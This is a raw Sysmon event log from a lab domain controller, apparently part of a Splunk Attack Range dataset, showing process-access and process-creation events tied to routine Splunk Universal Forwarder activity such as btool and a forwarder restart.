13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0D01-000000009101}4708C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-85E5-5FCF-0C01-000000009101}42684264C:\Windows\system32\cmd.exe{10ACEC4A-85E5-5FCF-0D01-000000009101}4708C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.979{10ACEC4A-85E5-5FCF-0D01-000000009101}4708C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E5-5FCF-0C01-000000009101}4268C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000006880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0C01-000000009101}4268C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0C01-000000009101}4268C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-85E5-5FCF-0801-000000009101}42803180C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{10ACEC4A-85E5-5FCF-0C01-000000009101}4268C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14738|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.974{10ACEC4A-85E5-5FCF-0C01-000000009101}4268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=3080 10341000x80000000000000006867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.935{10ACEC4A-85E5-5FCF-0B01-000000009101}4476744C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0B01-000000009101}4476C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 